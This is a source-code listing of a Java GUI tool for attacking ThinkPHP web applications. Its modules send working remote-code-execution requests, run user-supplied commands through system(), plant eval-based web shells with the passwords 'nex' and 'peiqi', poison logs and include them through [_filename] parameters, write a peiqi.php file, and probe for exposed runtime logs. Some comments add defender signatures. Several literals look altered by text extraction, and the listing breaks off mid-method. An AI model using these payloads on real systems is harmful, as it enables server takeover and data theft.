     * Runs the operation that takes an extra {@code cmd} argument against {@code url}.
     *
     * @param url target URL as supplied by the caller
     * @param cmd second argument, passed through as given; its interpretation is up to the
     *            implementation
     * @return the outcome reported by the implementation
     * @throws Exception implementation-defined
     */
    Result exeVUL(String url, String cmd) throws Exception;

    /**
     * Runs the third operation against {@code url}.
     *
     * <p>NOTE(review): its semantics are defined by the implementations, not by this interface.
     *
     * @param url target URL as supplied by the caller
     * @return the outcome reported by the implementation
     * @throws Exception implementation-defined
     */
    Result getShell(String url) throws Exception;
}
12 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/common/ProxyAuthenticator.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.common;
2 |
3 | import java.net.Authenticator;
4 | import java.net.PasswordAuthentication;
5 |
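/**
 * {@link Authenticator} that supplies one fixed username/password pair, and only when the
 * credentials are requested on behalf of a proxy.
 *
 * <p>NOTE(review): how this authenticator is installed is not visible here. If it is
 * registered with {@code Authenticator.setDefault}, the JDK consults it for origin-server
 * challenges as well as proxy ones, which is why the requestor type is checked below.
 */
public class ProxyAuthenticator extends Authenticator {
    private final String username;
    // Held as char[] so no extra String copy of the password is created on every challenge.
    private final char[] password;

    /**
     * @param username proxy account name
     * @param password proxy account password; {@code null} is treated as an empty password
     *                 instead of failing later with a NullPointerException
     */
    public ProxyAuthenticator(String username, String password) {
        this.username = username;
        this.password = password == null ? new char[0] : password.toCharArray();
    }

    /**
     * Answers proxy challenges with the configured credentials.
     *
     * @return the configured credentials for a proxy request, or {@code null} for any other
     *         requestor so that the proxy password is never offered to an origin server
     */
    @Override
    protected PasswordAuthentication getPasswordAuthentication() {
        if (getRequestorType() != RequestorType.PROXY) {
            return null;
        }
        // PasswordAuthentication clones the array, so the stored copy is not shared.
        return new PasswordAuthentication(username, password);
    }
}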
20 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/controller/ThinkphpGUIController.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.controller;
2 |
3 | import com.thinkphp.thinkphpgui.common.BasePayload;
4 | import com.thinkphp.thinkphpgui.entity.Result;
5 | import com.thinkphp.thinkphpgui.service.BatchCheckTask;
6 | import com.thinkphp.thinkphpgui.service.CheckTask;
7 | import com.thinkphp.thinkphpgui.util.*;
8 |
9 | import javafx.application.Platform;
10 | import javafx.fxml.FXML;
11 | import javafx.geometry.Insets;
12 | import javafx.geometry.Pos;
13 | import javafx.scene.control.*;
14 | import javafx.scene.layout.GridPane;
15 | import javafx.scene.layout.HBox;
16 | import javafx.stage.FileChooser;
17 | import javafx.stage.Stage;
18 | import javafx.stage.Window;
19 |
20 | import java.io.File;
21 | import java.util.ArrayList;
22 | import java.util.HashMap;
23 | import java.util.List;
24 | import java.util.Map;
25 |
26 | public class ThinkphpGUIController {
27 | //主UI元素定义
28 | @FXML
29 | private TextField url_txt, file_txt, cmd_txt;
30 | @FXML
31 | private TextArea infores_txt, cmdres_txt;
32 | @FXML
33 | private Button import_btn;
34 | @FXML
35 | private ComboBox comboBox;
36 | List list_url = new ArrayList<>();
37 | Alert alert = new Alert(Alert.AlertType.INFORMATION);
38 | public static Map currentProxy = new HashMap<>();
39 |
/**
 * Fills the selector: "ALL" is set as the current value and added as the first entry,
 * followed by everything returned by {@code ExpList.get_exp()}.
 */
public void initialize() {
    // The value is set before the items are added, as in the original ordering.
    comboBox.setValue("ALL");
    comboBox.getItems().add("ALL");
    comboBox.getItems().addAll(ExpList.get_exp());
}
45 |
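/**
 * Opens a dialog for editing the HTTP proxy settings and applies them when saved.
 *
 * <p>Saving with the disable radio selected records {@code proxy=N} and calls
 * {@code Tools.removeGlobalProxy()}. Any other state calls {@code Tools.setGlobalProxy}
 * (with credentials when a username was entered) and stores the entered values in
 * {@code currentProxy} so the dialog can be pre-filled next time.
 *
 * <p>The password is entered through a {@link PasswordField}, so it is masked on screen.
 * It is still kept as a plain String in the static {@code currentProxy} map for the
 * lifetime of the process.
 */
@FXML
private void proxy_set() {
    final Alert inputDialog = new Alert(Alert.AlertType.NONE);
    inputDialog.setResizable(true);
    // The dialog is created without buttons, so the window's own close request is
    // wired to hide it.
    final Window window = inputDialog.getDialogPane().getScene().getWindow();
    window.setOnCloseRequest(e -> window.hide());

    ToggleGroup statusGroup = new ToggleGroup();
    RadioButton enableRadio = new RadioButton("启用");
    RadioButton disableRadio = new RadioButton("禁用");
    enableRadio.setToggleGroup(statusGroup);
    disableRadio.setToggleGroup(statusGroup);
    HBox statusHbox = new HBox(10.0D, enableRadio, disableRadio);
    GridPane proxyGridPane = new GridPane();
    proxyGridPane.setVgap(15.0D);
    proxyGridPane.setPadding(new Insets(20.0D, 20.0D, 0.0D, 10.0D));
    Label typeLabel = new Label("类型:");
    Label type = new Label("HTTP");
    Label IPLabel = new Label("IP地址:");
    TextField IPText = new TextField();
    Label PortLabel = new Label("端口:");
    TextField PortText = new TextField();
    Label userNameLabel = new Label("用户名:");
    TextField userNameText = new TextField();
    Label passwordLabel = new Label("密码:");
    // PasswordField masks the typed characters; a plain TextField showed the proxy
    // password in clear text to anyone able to see the screen.
    PasswordField passwordText = new PasswordField();
    Button cancelBtn = new Button("取消");
    Button saveBtn = new Button("保存");
    saveBtn.setDefaultButton(true);

    // Pre-fill the form from the previously saved settings, if any.
    IPText.setText( currentProxy.getOrDefault("ipAddress", ""));
    PortText.setText(currentProxy.getOrDefault("port", ""));
    userNameText.setText(currentProxy.getOrDefault("username", ""));
    passwordText.setText(currentProxy.getOrDefault("password", ""));
    enableRadio.setSelected(currentProxy.get("proxy") != null && currentProxy.get("proxy").equals("Y"));

    saveBtn.setOnAction(e -> {
        if (disableRadio.isSelected()) {
            currentProxy.put("proxy", "N");
            Tools.removeGlobalProxy();
        } else {
            // NOTE(review): this branch also runs when neither radio is selected, so
            // saving an untouched dialog enables the proxy with whatever is in the
            // fields. The address and port are not validated here.
            String ipAddress = IPText.getText().trim();
            String port = PortText.getText().trim();
            String username = userNameText.getText().trim();
            String password = passwordText.getText().trim();
            if (!username.isEmpty()) {
                Tools.setGlobalProxy(ipAddress, port, username, password);
            } else {
                Tools.setGlobalProxy(ipAddress, port);
            }
            currentProxy.put("ipAddress", ipAddress);
            currentProxy.put("port", port);
            currentProxy.put("username", username);
            currentProxy.put("password", password);
            currentProxy.put("proxy", "Y");
        }
        inputDialog.getDialogPane().getScene().getWindow().hide();
    });

    cancelBtn.setOnAction(e -> inputDialog.getDialogPane().getScene().getWindow().hide());

    proxyGridPane.add(statusHbox, 1, 0);
    proxyGridPane.add(typeLabel, 0, 1);
    proxyGridPane.add(type, 1, 1);
    proxyGridPane.add(IPLabel, 0, 2);
    proxyGridPane.add(IPText, 1, 2);
    proxyGridPane.add(PortLabel, 0, 3);
    proxyGridPane.add(PortText, 1, 3);
    proxyGridPane.add(userNameLabel, 0, 4);
    proxyGridPane.add(userNameText, 1, 4);
    proxyGridPane.add(passwordLabel, 0, 5);
    proxyGridPane.add(passwordText, 1, 5);
    HBox buttonBox = new HBox(20.0D, cancelBtn, saveBtn);
    buttonBox.setAlignment(Pos.CENTER);
    GridPane.setColumnSpan(buttonBox, 2);
    proxyGridPane.add(buttonBox, 0, 6);
    inputDialog.getDialogPane().setContent(proxyGridPane);
    inputDialog.showAndWait();
}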
126 |
/** Shows the "about" message in the shared alert and waits for it to be dismissed. */
@FXML
private void about() {
    alert.setContentText("本人使用javafx更新了下UI,增加了几个poc,略微优化下代码!");
    alert.setHeaderText("by nex121");
    alert.setTitle("提示:");
    alert.showAndWait();
}
134 |
/** Empties both output panes (check results and command output). */
@FXML
private void clear() {
    final String blank = "";
    cmdres_txt.setText(blank);
    infores_txt.setText(blank);
}
140 |
/**
 * Appends one line to the info pane, deferring the UI update through
 * {@code Platform.runLater}.
 *
 * @param info text to append; a CRLF is added after it
 */
public void loginfo(String info) {
    final String line = info + "\r\n";
    Platform.runLater(() -> {
        this.infores_txt.appendText(line);
    });
}
144 |
/**
 * Appends text to the command-output pane, deferring the UI update through
 * {@code Platform.runLater}. No line terminator is added.
 *
 * @param info text to append verbatim
 */
public void logcmd(String info) {
    final String chunk = info;
    Platform.runLater(() -> {
        this.cmdres_txt.appendText(chunk);
    });
}
148 |
149 |
/**
 * Runs the selected module's {@code getShell} against the URL in the address field.
 *
 * <p>A selection starting with "ALL" is rejected with an alert. Otherwise the module is
 * looked up through {@code Tools.getPayload} and invoked directly from this handler; a
 * successful result is written to the info pane, a failed one raises an alert.
 *
 * <p>Reviewer note: unlike {@code check_url}, the URL is not passed through
 * {@code Tools.checkTheURL} here, and the call is not moved to a worker thread.
 */
@FXML
public void getShell() throws Exception {
    final String target = this.url_txt.getText();
    final String selected = this.comboBox.getSelectionModel().getSelectedItem();

    if (selected.startsWith("ALL")) {
        alert.setTitle("提示:");
        alert.setHeaderText("信息");
        alert.setContentText("请选择漏洞对应版本!");
        alert.showAndWait();
        return;
    }

    final Result outcome = Tools.getPayload(selected).getShell(target);
    if (!outcome.isRes()) {
        alert.setTitle("提示:");
        alert.setHeaderText("信息");
        alert.setContentText("Getshell失败");
        alert.showAndWait();
        return;
    }
    loginfo("[+] " + outcome.getPayload());
}
175 |
/**
 * Lets the user pick a file of URLs, loads it through {@code Tools.read_file} into
 * {@code list_url}, and reports how many entries were read. Cancelling the chooser leaves
 * everything unchanged.
 */
@FXML
public void batch_import_url() {
    final Stage owner = (Stage) import_btn.getScene().getWindow();
    final FileChooser chooser = new FileChooser();
    chooser.setTitle("Select URL File");

    final File picked = chooser.showOpenDialog(owner);
    if (picked == null) {
        return;
    }

    this.file_txt.setText(picked.getAbsolutePath());
    list_url = Tools.read_file(picked.getAbsolutePath());
    alert.setTitle("提示:");
    alert.setHeaderText("导入提示");
    alert.setContentText("成功导入" + list_url.size() + "个URL!");
    alert.showAndWait();
}
192 |
/**
 * Starts a {@code BatchCheckTask} over the imported URL list on a new thread.
 * The list is handed over as-is; this handler does not check that an import has happened.
 */
@FXML
public void batch_check_url() {
    final Thread worker = new Thread(new BatchCheckTask(list_url, comboBox, infores_txt));
    worker.start();
}
198 |
/**
 * Validates the URL field with {@code Tools.checkTheURL} and, when it passes, starts a
 * {@code CheckTask} on a new thread. An invalid URL raises an alert with an example format.
 */
@FXML
private void check_url() {
    if (!Tools.checkTheURL(this.url_txt.getText())) {
        alert.setTitle("提示:");
        alert.setHeaderText("URL检查");
        alert.setContentText("URL格式不符合要求,示例:http://127.0.0.1:7001");
        alert.showAndWait();
        return;
    }

    final Thread worker = new Thread(new CheckTask(comboBox, url_txt, infores_txt));
    worker.start();
}
213 |
/**
 * Runs the selected module's {@code exeVUL} with the command-field text against the URL in
 * the address field.
 *
 * <p>A selection starting with "ALL" is rejected with an alert. A successful result is
 * written to the command-output pane; a failed one raises an alert.
 *
 * <p>Reviewer note: the URL is not passed through {@code Tools.checkTheURL} here, and the
 * call is made directly from this handler rather than on a worker thread.
 */
@FXML
public void exe_vul() throws Exception {
    final String target = this.url_txt.getText();
    final String selected = this.comboBox.getSelectionModel().getSelectedItem();
    final String command = this.cmd_txt.getText();

    if (selected.startsWith("ALL")) {
        alert.setTitle("提示:");
        alert.setHeaderText("信息");
        alert.setContentText("请选择漏洞对应版本!");
        alert.showAndWait();
        return;
    }

    final Result outcome = Tools.getPayload(selected).exeVUL(target, command);
    if (!outcome.isRes()) {
        alert.setTitle("提示:");
        alert.setHeaderText("信息");
        alert.setContentText("命令执行失败!");
        alert.showAndWait();
        return;
    }
    logcmd("[+] " + outcome.getPayload());
}
240 | }
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/entity/Result.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.entity;
2 |
3 |
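/**
 * Outcome of one payload-module call.
 *
 * <p>{@code payload} is free text chosen by the module: a request URL, a request
 * description, or the raw response body of the target. It can therefore hold data returned
 * by the target, including credentials (the {@code tp5_db} module puts database settings
 * in it), so treat it as sensitive wherever it is logged or displayed. Both {@code payload}
 * and {@code vuln} may be {@code null}.
 */
public class Result {
    // Fields are private; only the success flag has a setter, the rest is fixed at construction.
    private boolean res;
    private final String payload;
    private final String vuln;

    /**
     * Creates a result.
     *
     * @param res     whether the module considers the call successful
     * @param vuln    display label of the issue, or {@code null}
     * @param payload module-specific detail text, or {@code null}; note that it comes
     *                after {@code vuln} in the parameter list
     */
    public Result(boolean res, String vuln, String payload) {
        this.res = res;
        this.payload = payload;
        this.vuln = vuln;
    }

    /** @return the success flag */
    public boolean isRes() {
        return res;
    }

    /** @param res new value of the success flag */
    public void setRes(boolean res) {
        this.res = res;
    }

    /** @return the module-specific detail text, possibly {@code null} */
    public String getPayload() {
        return payload;
    }

    /** @return the display label of the issue, possibly {@code null} */
    public String getVuln() {
        return vuln;
    }
}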
32 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp2_rce.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
/**
 * Payload module labelled "ThinkPHP 2 RCE".
 *
 * <p>Defender view: every request built here places a {@code ${...}} expression inside the
 * {@code s} query parameter of a GET request, so access logs and request filters can key on
 * that pattern in {@code s}.
 */
public class tp2_rce implements BasePayload {
    /**
     * Sends one GET request and reports the target as affected when the response body
     * contains "PHP Version".
     *
     * @param url base URL; the probe path is appended without normalisation
     * @return a true Result carrying the probe URL on a match, otherwise a false Result
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        String CheckStr = "PHP Version";
        String payload = url + "/?s=/index/index/name/$%7B@phpinfo()%7D";
        try {
            HttpRequest req = HttpRequest.get(payload);
            if (req.body().contains(CheckStr)) {
                return new Result(true, "ThinkPHP 2 RCE", payload);
            }
        } catch (Exception e) {
            // Request failures are printed and otherwise ignored; the method falls through to "false".
            e.printStackTrace();
        }
        return new Result(false, "ThinkPHP 2 RCE", null);
    }

    /**
     * Sends one GET request with {@code cmd} concatenated into the {@code s} parameter and
     * returns the response body.
     *
     * <p>The result is flagged true whenever the request completes; neither the status code
     * nor the body is inspected, so "true" here is not evidence that anything ran.
     *
     * @param url base URL
     * @param cmd text inserted into the request as-is, without encoding
     */
    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        String payload = url + "?s=/index/index/index/${system(" + cmd + ")}";
        try {
            String res = HttpRequest.get(payload).body();
            return new Result(true, null, res);
        } catch (Exception e) {
            e.printStackTrace();
        }
        return new Result(false, null, null);
    }

    /**
     * Sends one GET request and treats HTTP 200 as success, returning the request URL plus
     * the POST parameter name used by the expression.
     *
     * <p>Only the status code is checked, so any page that answers 200 yields a true result.
     */
    @Override
    public Result getShell(String url) throws Exception {
        try {
            String shell_url = url + "/?s=/index/index/index/${@print(eval($_POST[nex]))}";
            int code = HttpRequest.get(shell_url).code();
            if (code == 200) {
                return new Result(true, null, shell_url+" Pass:nex");
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
        return new Result(false, null, null);
    }
}
49 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp3.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.util.Module;
6 | import com.thinkphp.thinkphpgui.entity.Result;
7 |
/**
 * Payload module labelled "ThinkPHP 3.x RCE".
 *
 * <p>Defender view: all three requests are GETs whose {@code s} parameter contains
 * {@code \think\module/action/param1/} followed by a {@code ${...}} expression; that path
 * fragment is a usable log and filter signature.
 */
public class tp3 implements BasePayload {
    /**
     * Sends one GET request and reports the target as affected when the response body
     * contains "PHP Version".
     *
     * @param url base URL; {@code Module.getModule(url)} supplies the module segment
     * @return a true Result carrying the probe URL on a match, otherwise a false Result
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        String CheckStr = "PHP Version";
        // Called outside the try block, so an exception from getModule propagates to the caller.
        String module = Module.getModule(url);
        String payload = url + "/?s=" + module + "/\\think\\module/action/param1/${@phpinfo()}";
        try {
            HttpRequest req = HttpRequest.get(payload);
            if (req.body().contains(CheckStr)) {
                return new Result(true, "ThinkPHP 3.x RCE", payload);
            }
        } catch (Exception e) {
            // Request failures are printed and otherwise ignored.
            e.printStackTrace();
        }
        return new Result(false, "ThinkPHP 3.x RCE", null);
    }

    /**
     * Sends one GET request with {@code cmd} appended as the {@code x} parameter and returns
     * the response body.
     *
     * <p>The result is flagged true whenever the request completes; the response is not
     * inspected.
     *
     * @param cmd text appended to the URL as-is, without encoding
     */
    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        String module = Module.getModule(url);
        String payload_url = url + "/?s=" + module + "/\\think\\module/action/param1/{${system($_GET['x'])}}?x=" + cmd;
        try {
            String res = HttpRequest.get(payload_url).body();
            return new Result(true, null, res);
        } catch (Exception e) {
            e.printStackTrace();
        }
        return new Result(false, null, null);
    }

    /**
     * Sends one GET request and treats HTTP 200 as success, returning the request URL.
     *
     * <p>Only the status code is checked, so any page that answers 200 yields a true result.
     */
    @Override
    public Result getShell(String url) throws Exception {
        try {
            String module = Module.getModule(url);
            String shell_url = url + "/?s=" + module + "/\\think\\module/action/param1/{${eval($_POST['peiqi'])}}";
            int code = HttpRequest.get(shell_url).code();
            if (code == 200) {
                return new Result(true, null, shell_url);
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
        return new Result(false, null, null);
    }
}
53 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp3_log.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | import java.util.ArrayList;
8 | import java.util.Date;
9 |
10 |
/**
 * Check-only module labelled "ThinkPHP 3.x 日志泄露" (log disclosure).
 *
 * <p>Defender view: the check succeeds only when a runtime log file can be fetched over
 * HTTP. The candidate paths below all end in {@code Runtime/Logs/...}; keeping those
 * directories out of the document root, or denying web access to them, removes the exposure.
 */
public class tp3_log implements BasePayload {
    /**
     * Requests today's log file under a fixed list of directories and reports a hit when a
     * response contains "INFO:" or "[ error ]".
     *
     * @param url base URL the candidate paths are appended to
     * @return a true Result with the first matching URL, otherwise a false Result
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        String CheckStr = "INFO:";
        String CheckErr = "[ error ]";
        // File names are derived from the clock of the machine running the check.
        Date dt = new Date();
        String year = String.format("%tY", dt);
        String mon = String.format("%tm", dt);
        String day = String.format("%td", dt);
        // First ten digits of the millisecond timestamp, i.e. the current time in seconds.
        String sjc = String.valueOf(dt.getTime()).substring(0, 10);
        // Two name shapes are tried: "yy_MM_dd.log" and "<seconds>-yy_MM_dd.log".
        String suffix1 = year.substring(2, 4) + "_" + mon + "_" + day + ".log";
        String suffix2 = sjc + "-" + year.substring(2, 4) + "_" + mon + "_" + day + ".log";
        // NOTE(review): the type arguments look lost in this listing; the String for-each
        // below implies ArrayList<String> — confirm against the repository.
        ArrayList payload_urls = new ArrayList() {{
            add(url + "/Runtime/Logs/" + suffix1);
            add(url + "/Runtime/Logs/" + suffix2);

            add(url + "/Runtime/Logs/Home/" + suffix1);
            add(url + "/Runtime/Logs/Home/" + suffix2);

            add(url + "/Runtime/Logs/Common/" + suffix1);
            add(url + "/Runtime/Logs/Common/" + suffix2);

            add(url + "/App/Runtime/Logs/" + suffix1);
            add(url + "/App/Runtime/Logs/" + suffix2);

            add(url + "/App/Runtime/Logs/Home/" + suffix1);
            add(url + "/App/Runtime/Logs/Home/" + suffix2);

            add(url + "/Application/Runtime/Logs/" + suffix1);
            add(url + "/Application/Runtime/Logs/" + suffix2);

            add(url + "/Application/Runtime/Logs/Admin/" + suffix1);
            add(url + "/Application/Runtime/Logs/Admin/" + suffix2);

            add(url + "/Application/Runtime/Logs/Home/" + suffix1);
            add(url + "/Application/Runtime/Logs/Home/" + suffix2);

            add(url + "/Application/Runtime/Logs/App/" + suffix1);
            add(url + "/Application/Runtime/Logs/App/" + suffix2);

            add(url + "/Application/Runtime/Logs/Ext/" + suffix1);
            add(url + "/Application/Runtime/Logs/Ext/" + suffix2);

            add(url + "/Application/Runtime/Logs/Api/" + suffix1);
            add(url + "/Application/Runtime/Logs/Api/" + suffix2);

            add(url + "/Application/Runtime/Logs/Test/" + suffix1);
            add(url + "/Application/Runtime/Logs/Test/" + suffix2);

            add(url + "/Application/Runtime/Logs/Common/" + suffix1);
            add(url + "/Application/Runtime/Logs/Common/" + suffix2);

            add(url + "/Application/Runtime/Logs/Service/" + suffix1);
            add(url + "/Application/Runtime/Logs/Service/" + suffix2);
        }};
        // The whole loop sits in one try: the first request that throws ends the scan and
        // the remaining candidates are never requested.
        try {
            for (String payload_url : payload_urls) {
                String res = HttpRequest.get(payload_url).body();
                if (res.contains(CheckStr) || res.contains(CheckErr)) {
                    return new Result(true, "ThinkPHP 3.x 日志泄露", payload_url);
                }
            }

        } catch (Exception e) {
            e.printStackTrace();
        }

        return new Result(false, "ThinkPHP 3.x 日志泄露", null);
    }

    /** Not supported by this module; always returns a false Result. */
    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        return new Result(false, null, null);
    }

    /** Not supported by this module; always returns a false Result. */
    @Override
    public Result getShell(String url) throws Exception {
        return new Result(false, null, null);
    }
}
91 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp3_log_rce.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | import java.util.ArrayList;
8 | import java.util.Date;
9 |
10 |
/**
 * Payload module labelled "ThinkPHP 3.x Log RCE".
 *
 * <p>Every operation is a pair of GET requests: one carrying code text in the {@code test}
 * parameter, then one or more whose {@code <name>[_filename]} parameter points at today's
 * file under {@code /Application/Runtime/Logs/Home/}.
 *
 * <p>Defender view: a {@code [_filename]} array key in a query string, and PHP tags inside
 * request parameters recorded in the application log, are the visible signatures. Note that
 * the check itself sends content to the target, so it is not a read-only probe.
 *
 * <p>NOTE(review): several string literals in this listing look altered by text extraction
 * (for example the {@code ¶m} sequence and the {@code test=} values); they are kept exactly
 * as found.
 */
public class tp3_log_rce implements BasePayload {
    // The log file name ("yy_MM_dd.log") is computed once, when the object is created, from
    // the local clock; it is not refreshed on later calls.
    Date dt = new Date();
    String year = String.format("%tY", dt);
    String mon = String.format("%tm", dt);
    String day = String.format("%td", dt);
    String suffix1 = year.substring(2, 4) + "_" + mon + "_" + day + ".log";

    /**
     * Sends the {@code test=} request once, then requests the log file through a list of
     * {@code [_filename]} parameter names and reports a hit when a response contains
     * "PHP Version".
     *
     * @return a true Result with the first matching URL, otherwise a false Result
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        String CheckStr = "PHP Version";

        String payload_log = url + "?m=Home&c=Index&a=index&test=-->=phpinfo();?>";
        // NOTE(review): type arguments look lost in this listing; the String for-each below
        // implies ArrayList<String>.
        ArrayList log_rces = new ArrayList() {{
            add(url + "/?m=Home&c=Index&a=index&value[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
            add(url + "/?m=Home&c=Index&a=index&info[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
            add(url + "/?m=Home&c=Index&a=index¶m[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
            add(url + "/?m=Home&c=Index&a=index&name[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
            add(url + "/?m=Home&c=Index&a=index&array[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
            add(url + "/?m=Home&c=Index&a=index&arr[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
            add(url + "/?m=Home&c=Index&a=index&list[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
            add(url + "/?m=Home&c=Index&a=index&page[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
            add(url + "/?m=Home&c=Index&a=index&menus[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
            add(url + "/?m=Home&c=Index&a=index&var[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
            add(url + "/?m=Home&c=Index&a=index&data[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
            add(url + "/?m=Home&c=Index&a=index&module[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
        }};

        // Send the first request once, then run the checks, instead of re-sending it per check.
        try {
            // The response of this request is not used.
            String log = HttpRequest.get(payload_log).body();
        } catch (Exception e) {
            e.printStackTrace();
        }
        // Each candidate has its own try, so one failed request does not stop the scan.
        for (String log_rce : log_rces) {
            try {
                String res = HttpRequest.get(log_rce).body();
                if (res.contains(CheckStr)) {
                    return new Result(true, "ThinkPHP 3.x Log RCE", log_rce);
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
        return new Result(false, "ThinkPHP 3.x Log RCE", null);
    }

    /**
     * Sends a {@code test=} request containing {@code cmd}, then requests the log file via
     * {@code value[_filename]} and treats HTTP 200 as success.
     *
     * <p>The returned payload is the second request's URL, not any command output, and only
     * the status code is checked.
     *
     * @param cmd text inserted into the request as-is, without encoding
     */
    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        String log_exe = url + "/?m=Home&c=Index&a=index&test=-->=system('" + cmd + "');?>";
        String log_res = url + "/?m=Home&c=Index&a=index&value[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1;
        try {
            String log = HttpRequest.get(log_exe).body();
            int code = HttpRequest.get(log_res).code();
            if (code == 200) {
                return new Result(true, null, log_res);
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
        return new Result(false, null, null);
    }

    /**
     * Same two-request sequence as {@code exeVUL} with a fixed {@code test=} value; HTTP 200
     * on the second request is reported as success together with the POST parameter name.
     */
    @Override
    public Result getShell(String url) throws Exception {
        String log_shell = url + "/?m=Home&c=Index&a=index&test=-->=@eval($_POST['peiqi']);?>";
        String log_res = url + "/?m=Home&c=Index&a=index&value[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1;
        try {
            String log = HttpRequest.get(log_shell).body();
            int code = HttpRequest.get(log_res).code();
            if (code == 200) {
                return new Result(true, null, log_res + " Pass:peiqi");
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
        return new Result(false, null, null);
    }

}
90 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp50.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.util.Module;
6 | import com.thinkphp.thinkphpgui.entity.Result;
7 |
8 | import java.util.ArrayList;
9 |
10 |
/**
 * Payload module labelled "ThinkPHP 5.0 RCE".
 *
 * <p>Defender view: every request is a GET whose {@code s} parameter contains
 * {@code \think\Container/invokefunction} together with
 * {@code function=call_user_func_array}; {@code getShell} additionally looks for a file
 * named {@code peiqi.php} at the site root, which is worth searching for on a host that
 * shows these requests in its logs.
 */
public class tp50 implements BasePayload {
    /**
     * Tries two probe URLs and reports a hit when a response body contains "PHP Version".
     *
     * @return a true Result with the first matching URL, otherwise a false Result
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        String CheckStr = "PHP Version";
        String module = Module.getModule(url);
        // NOTE(review): type arguments look lost in this listing; the String for-each below
        // implies ArrayList<String>.
        ArrayList payload_urls = new ArrayList() {{
            add(url + "/?s=/" + module + "/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1");
            add(url + "/?s=/" + module + "/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()");
        }};

        for (String payload_url : payload_urls) {
            try {
                HttpRequest req1 = HttpRequest.get(payload_url);
                if (req1.body().contains(CheckStr)) {
                    return new Result(true, "ThinkPHP 5.0 RCE", payload_url);
                }
            } catch (Exception e) {
                // A failed request is printed and the next candidate is tried.
                e.printStackTrace();
            }
        }
        return new Result(false, "ThinkPHP 5.0 RCE", null);
    }

    /**
     * Sends one GET request with {@code cmd} appended and returns the response body.
     *
     * <p>The result is flagged true whenever the request completes; the response is not
     * inspected.
     *
     * @param cmd text appended to the URL as-is, without encoding
     */
    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        String module = Module.getModule(url);
        try {
            String payload_url = url + "/?s=" + module + "/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=" + cmd;
            HttpRequest req = HttpRequest.get(payload_url);
            String res = req.body();
            return new Result(true, null, res);
        } catch (Exception e) {
            e.printStackTrace();
        }
        return new Result(false, null, null);
    }

    /**
     * Sends one GET request, then requests {@code /peiqi.php} and treats HTTP 200 on that
     * second request as success.
     *
     * <p>NOTE(review): the quoted content inside the literal below is empty in this listing
     * (it looks removed by text extraction); it is kept exactly as found.
     */
    @Override
    public Result getShell(String url) throws Exception {
        String module = Module.getModule(url);
        try {
            String payload_url = url + "/?s=" + module + "/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '' >>peiqi.php";
            // code() is called only to make the request complete; its value is discarded.
            HttpRequest.get(payload_url).code();
            int code = HttpRequest.get(url + "/peiqi.php").code();
